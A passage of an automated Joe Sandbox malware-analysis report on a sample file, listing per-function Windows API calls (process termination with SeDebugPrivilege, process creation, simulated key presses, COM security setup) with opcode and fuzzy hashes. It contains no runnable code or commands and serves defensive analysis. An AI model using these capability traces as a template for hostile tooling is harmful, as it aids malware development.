                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    • Opcode ID: 08169c8c9d32e292cf613084887ee520b215fc394175aedc826e174af9703aa9
                                                    • Instruction ID: a5f1b6bfdfa5fb51573d16e6ecab31b66c567c308999f7c3f3286eff93a1116b
                                                    • Opcode Fuzzy Hash: 08169c8c9d32e292cf613084887ee520b215fc394175aedc826e174af9703aa9
                                                    • Instruction Fuzzy Hash: E171C330500205EFCF298F64D894AFA7BB7FF49364F14426AFD556A2A6C7318C52DBA0
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0068F910), ref: 0067903D
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0068F910), ref: 00679071
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006791EB
                                                    • SysFreeString.OLEAUT32(?), ref: 00679215
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    • Opcode ID: f97c49644d5203d8e207ed9986c77b48fc2b74d911a5eec75fffecc51c3c5369
                                                    • Instruction ID: 66beaf809199f6b5f781cd939fb2ae690409f95bbcf816faa16e5dac31d73465
                                                    • Opcode Fuzzy Hash: f97c49644d5203d8e207ed9986c77b48fc2b74d911a5eec75fffecc51c3c5369
                                                    • Instruction Fuzzy Hash: B9F1F971A00109EFDB04DF94C888EEEB7BAFF49315F108559F519AB291DB31AE46CB60
                                                    APIs
                                                    • _memset.LIBCMT ref: 0067F9C9
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0067FB5C
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0067FB80
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0067FBC0
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0067FBE2
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0067FD5E
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0067FD90
                                                    • CloseHandle.KERNEL32(?), ref: 0067FDBF
                                                    • CloseHandle.KERNEL32(?), ref: 0067FE36
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    • Opcode ID: 1049631df628240010388e0ee0ed110cd178a6c9ec94ac6ec4ba4ca913eaec14
                                                    • Instruction ID: b7bd2c6924eb6d264e1bfd64aabda4d0921b1309d2f6da33b943294619c7af1a
                                                    • Opcode Fuzzy Hash: 1049631df628240010388e0ee0ed110cd178a6c9ec94ac6ec4ba4ca913eaec14
                                                    • Instruction Fuzzy Hash: E1E19F31204241DFCB54EF24C891AABBBE2AF84314F14896DF8999B3A2DB31DC45CB56
                                                    APIs
                                                      • Part of subcall function 006648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006638D3,?), ref: 006648C7
                                                      • Part of subcall function 006648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006638D3,?), ref: 006648E0
                                                      • Part of subcall function 00664CD3: GetFileAttributesW.KERNEL32(?,00663947), ref: 00664CD4
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00664FE2
                                                    • _wcscmp.LIBCMT ref: 00664FFC
                                                    • MoveFileW.KERNEL32(?,?), ref: 00665017
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    • Opcode ID: 33b71a2edbf6ed57dbde9c939c31b9b52be18d89212e190da123eff2b0f55dae
                                                    • Instruction ID: 629df6d3fac3ec25269aa590a3b12157c3ceb39df4c8ccae8080ced2f248daac
                                                    • Opcode Fuzzy Hash: 33b71a2edbf6ed57dbde9c939c31b9b52be18d89212e190da123eff2b0f55dae
                                                    • Instruction Fuzzy Hash: E65166B24087859BC764DB60DC819DFB3EDAF85340F00492EB186D3191EF74E6888B6A
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0068896E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 6311287de0d2c5920685e87257d0d6c9900b69f498fbc16a6d2b405e35d08468
                                                    • Instruction ID: 00e7914ca4f75c94fa5f245cd6230cefd5bb6e1e23bb6cde9686b8dd0772a35a
                                                    • Opcode Fuzzy Hash: 6311287de0d2c5920685e87257d0d6c9900b69f498fbc16a6d2b405e35d08468
                                                    • Instruction Fuzzy Hash: 35517170540209BEEF24AF28CC89BAA7B67AF05310FA04316F515E72E1DF71A9809B55
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0063C547
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0063C569
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0063C581
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0063C59F
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0063C5C0
                                                    • DestroyIcon.USER32(00000000), ref: 0063C5CF
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0063C5EC
                                                    • DestroyIcon.USER32(?), ref: 0063C5FB
                                                      • Part of subcall function 0068A71E: DeleteObject.GDI32(00000000), ref: 0068A757
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID:
                                                    • API String ID: 2819616528-0
                                                    • Opcode ID: 1304f74824cecde5f3f1d2b38f96454a92ccf14046494483c113654134b04598
                                                    • Instruction ID: ba6f9a85d34e44f3e7deeb17435140668d7bb7b801404126d635630e63ecf217
                                                    • Opcode Fuzzy Hash: 1304f74824cecde5f3f1d2b38f96454a92ccf14046494483c113654134b04598
                                                    • Instruction Fuzzy Hash: 4E514A74640205AFDB24DF24CC59FAB37A6EF54320F104629F902A72D0DB70ED91DBA0
                                                    APIs
                                                      • Part of subcall function 0065AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0065AE77
                                                      • Part of subcall function 0065AE57: GetCurrentThreadId.KERNEL32 ref: 0065AE7E
                                                      • Part of subcall function 0065AE57: AttachThreadInput.USER32(00000000,?,00659B65,?,00000001), ref: 0065AE85
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00659B70
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00659B8D
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00659B90
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00659B99
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00659BB7
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00659BBA
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00659BC3
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00659BDA
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00659BDD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 3546a9c2c003482d13f1fe771fed4a7e56506810a507a9e3bd7b1dba7395b2f9
                                                    • Instruction ID: abd1aa60e892bfd2b020e140003f2f3ec4f3717b6f99e6592d2439601741bed8
                                                    • Opcode Fuzzy Hash: 3546a9c2c003482d13f1fe771fed4a7e56506810a507a9e3bd7b1dba7395b2f9
                                                    • Instruction Fuzzy Hash: 3311E571550218BEF7106B60DC8EF6A3B2EDB4C751F101629F644AB0A0C9F25C50DBA4
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00658A84,00000B00,?,?), ref: 00658E0C
                                                    • HeapAlloc.KERNEL32(00000000,?,00658A84,00000B00,?,?), ref: 00658E13
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00658A84,00000B00,?,?), ref: 00658E28
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00658A84,00000B00,?,?), ref: 00658E30
                                                    • DuplicateHandle.KERNEL32(00000000,?,00658A84,00000B00,?,?), ref: 00658E33
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00658A84,00000B00,?,?), ref: 00658E43
                                                    • GetCurrentProcess.KERNEL32(00658A84,00000000,?,00658A84,00000B00,?,?), ref: 00658E4B
                                                    • DuplicateHandle.KERNEL32(00000000,?,00658A84,00000B00,?,?), ref: 00658E4E
                                                    • CreateThread.KERNEL32(00000000,00000000,00658E74,00000000,00000000,00000000), ref: 00658E68
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: b751c7010ca4d5be1b414e3078fe1809c26ce68a90fa2fe721f053ebf15a86aa
                                                    • Instruction ID: c0ac6240ffa685d5b8217831d365010e8aa607c02c426de195d67c3b7895c94a
                                                    • Opcode Fuzzy Hash: b751c7010ca4d5be1b414e3078fe1809c26ce68a90fa2fe721f053ebf15a86aa
                                                    • Instruction Fuzzy Hash: 1201BBB5240348FFE710ABA5DC8DF6B3BADEB89711F015521FA05DB1A1CA749810CB20
                                                    APIs
                                                      • Part of subcall function 00657652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?,?,0065799D), ref: 0065766F
                                                      • Part of subcall function 00657652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?), ref: 0065768A
                                                      • Part of subcall function 00657652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?), ref: 00657698
                                                      • Part of subcall function 00657652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?), ref: 006576A8
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00679B1B
                                                    • _memset.LIBCMT ref: 00679B28
                                                    • _memset.LIBCMT ref: 00679C6B
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00679C97
                                                    • CoTaskMemFree.OLE32(?), ref: 00679CA2
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 00679CF0
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    • Opcode ID: be82b5151465eda5cf5074b7a8a2e8d3a703f83d8fba28e8f40318bf1aa03070
                                                    • Instruction ID: 01f070df0efe3af761d41c9116d418dc8406814c7c5222210b070a9ae80741c3
                                                    • Opcode Fuzzy Hash: be82b5151465eda5cf5074b7a8a2e8d3a703f83d8fba28e8f40318bf1aa03070
                                                    • Instruction Fuzzy Hash: 67912A71D00229EBDF14DFA4DC81EDEBBBAAF08710F208159F519A7281DB715A45CFA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00687093
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 006870A7
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006870C1
                                                    • _wcscat.LIBCMT ref: 0068711C
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00687133
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00687161
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    • Opcode ID: 1b312ed5b59ff0d4e8e30e33eace1a913d40a4b88fa80297e95338220b10755e
                                                    • Instruction ID: 4d43fdbce255914dd059ac76a6097eeaadec218d86a9b9696ad9f5cf5cc4be64
                                                    • Opcode Fuzzy Hash: 1b312ed5b59ff0d4e8e30e33eace1a913d40a4b88fa80297e95338220b10755e
                                                    • Instruction Fuzzy Hash: F141A471944308AFDB21EF64CC85BEE77AAEF08354F20062AF584E7291D771DD848B64
                                                    APIs
                                                      • Part of subcall function 00663E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00663EB6
                                                      • Part of subcall function 00663E91: Process32FirstW.KERNEL32(00000000,?), ref: 00663EC4
                                                      • Part of subcall function 00663E91: CloseHandle.KERNEL32(00000000), ref: 00663F8E
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0067ECB8
                                                    • GetLastError.KERNEL32 ref: 0067ECCB
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0067ECFA
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0067ED77
                                                    • GetLastError.KERNEL32(00000000), ref: 0067ED82
                                                    • CloseHandle.KERNEL32(00000000), ref: 0067EDB7
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: 66f3f8d0121ae5dea72eccdfffb2f4ad2894bce4131eb9625145fdfb9a64c90b
                                                    • Instruction ID: 3c2a6377c41d2d018b6d37cebd77d314061c92cd5bec487a4ab96acc0093342a
                                                    • Opcode Fuzzy Hash: 66f3f8d0121ae5dea72eccdfffb2f4ad2894bce4131eb9625145fdfb9a64c90b
                                                    • Instruction Fuzzy Hash: 4D418E712002019FDB24EF24CC95FAEB7A7AF44714F18845DF8469B3D2DBB5A809CB99
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 006632C5
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 60f8e5a70a1a101048050dd72b0d9a338e957bfa3fc926342779822ac351850e
                                                    • Instruction ID: 83428045b8f71d822f8c579c1141d5b75a3f81cd22ec4e2be975ceba2c3e5d50
                                                    • Opcode Fuzzy Hash: 60f8e5a70a1a101048050dd72b0d9a338e957bfa3fc926342779822ac351850e
                                                    • Instruction Fuzzy Hash: 0B11EB312087B67BA7015B55EC62CEAB3AEDF19370F20002AF50056381D7765B414AA5
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0066454E
                                                    • LoadStringW.USER32(00000000), ref: 00664555
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0066456B
                                                    • LoadStringW.USER32(00000000), ref: 00664572
                                                    • _wprintf.LIBCMT ref: 00664598
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006645B6
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00664593
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 569b4b73b5b213c66928aec453d54e1288d804f09d8306bca923603c7262740e
                                                    • Instruction ID: 0399a7de5ad4b1c45eb42cf9764de55e147b5fcc3ff74289f71b7806feeff898
                                                    • Opcode Fuzzy Hash: 569b4b73b5b213c66928aec453d54e1288d804f09d8306bca923603c7262740e
                                                    • Instruction Fuzzy Hash: C10162F2900208BFE750ABA0DD89EE7776DEB08301F0006A5BB46E2151EA749EC58B74
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • GetSystemMetrics.USER32(0000000F), ref: 0068D78A
                                                    • GetSystemMetrics.USER32(0000000F), ref: 0068D7AA
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0068D9E5
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0068DA03
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0068DA24
                                                    • ShowWindow.USER32(00000003,00000000), ref: 0068DA43
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0068DA68
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0068DA8B
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-0
                                                    • Opcode ID: 9b494c4b3a408cec1cf46676a66b660dd0fec697563c92098b897910c6e4aa3f
                                                    • Instruction ID: 7087c8bf241eb22d5c8933dcbe41a466ce4172d22c6286fa2239397466f6f29b
                                                    • Opcode Fuzzy Hash: 9b494c4b3a408cec1cf46676a66b660dd0fec697563c92098b897910c6e4aa3f
                                                    • Instruction Fuzzy Hash: D6B17971600215EBDF18DF68C9857FD7BB2BF44701F188269EC48AB295DB34A990CB60
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0063C417,00000004,00000000,00000000,00000000), ref: 00602ACF
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0063C417,00000004,00000000,00000000,00000000,000000FF), ref: 00602B17
                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0063C417,00000004,00000000,00000000,00000000), ref: 0063C46A
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0063C417,00000004,00000000,00000000,00000000), ref: 0063C4D6
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: f094821e9f963b0879c1b676273847d0bd8224d069820aac2a0f26a29a922142
                                                    • Instruction ID: 1caad5de953756771d75f3cc45443f20539fa1a7db68a354f01f431185a5279d
                                                    • Opcode Fuzzy Hash: f094821e9f963b0879c1b676273847d0bd8224d069820aac2a0f26a29a922142
                                                    • Instruction Fuzzy Hash: B2413C30344681AACB3D8B28DCBCBBB7BD3AF45314F18891DF047966E1DA359882D760
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0066737F
                                                      • Part of subcall function 00620FF6: std::exception::exception.LIBCMT ref: 0062102C
                                                      • Part of subcall function 00620FF6: __CxxThrowException@8.LIBCMT ref: 00621041
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006673B6
                                                    • EnterCriticalSection.KERNEL32(?), ref: 006673D2
                                                    • _memmove.LIBCMT ref: 00667420
                                                    • _memmove.LIBCMT ref: 0066743D
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0066744C
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00667461
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00667480
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 256516436-0
                                                    • Opcode ID: bfd9581a94fafc048b4352bbd0a6f2ae1194c40ee2cbe6ad765f9063a316a8f2
                                                    • Instruction ID: bd10f3f1a78245a8a9db2b52f7c57b160adc620c99b8c582bf4cce246812a977
                                                    • Opcode Fuzzy Hash: bfd9581a94fafc048b4352bbd0a6f2ae1194c40ee2cbe6ad765f9063a316a8f2
                                                    • Instruction Fuzzy Hash: B031CF31904215EBCF10DFA4DC89AAEBBBAEF45710F1441A9FD04AB246DB309A50CBA4
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 0068645A
                                                    • GetDC.USER32(00000000), ref: 00686462
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0068646D
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00686479
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006864B5
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006864C6
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00689299,?,?,000000FF,00000000,?,000000FF,?), ref: 00686500
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00686520
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: 2f2338b5e85c789627c22dc2211619eacbad36bf8884dba43693a2bd144dc871
                                                    • Instruction ID: ac449edfbdc60dc606f23b2f1e417971952b6133d892293336eb18ecc28152c8
                                                    • Opcode Fuzzy Hash: 2f2338b5e85c789627c22dc2211619eacbad36bf8884dba43693a2bd144dc871
                                                    • Instruction Fuzzy Hash: 41319C72200214BFEB109F10CC8AFEA3FAAEF09765F045265FE089A291D6B59C41CB75
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: e803e3b9b9282c613c069d8a6ace3d9b0659f0cb26a5a9f8df9aa7c6c1b83427
                                                    • Instruction ID: 4c1a250d713b63844daebfcf1b63fb0fb1d8985319c7a5303e622f399d176512
                                                    • Opcode Fuzzy Hash: e803e3b9b9282c613c069d8a6ace3d9b0659f0cb26a5a9f8df9aa7c6c1b83427
                                                    • Instruction Fuzzy Hash: C4210A71604B16BFDA60A6209C56FFF239F9F213B6F040014FD059ABC2E712DD1985A5
                                                    APIs
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                      • Part of subcall function 0061FEC6: _wcscpy.LIBCMT ref: 0061FEE9
                                                    • _wcstok.LIBCMT ref: 0066EEFF
                                                    • _wcscpy.LIBCMT ref: 0066EF8E
                                                    • _memset.LIBCMT ref: 0066EFC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X
                                                    • API String ID: 774024439-3081909835
                                                    • Opcode ID: 9061a757aa6b6443b36da6553b71e478ecadfaebf17836849675156d7c2cd2dd
                                                    • Instruction ID: b533993a9814bf36d594651d72814c98f70f744fa1edad2215f99f0764083981
                                                    • Opcode Fuzzy Hash: 9061a757aa6b6443b36da6553b71e478ecadfaebf17836849675156d7c2cd2dd
                                                    • Instruction Fuzzy Hash: B9C191755483009FC768EF24D881A9BB7E6FF85310F04492DF8998B2A2DB30ED45CB96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
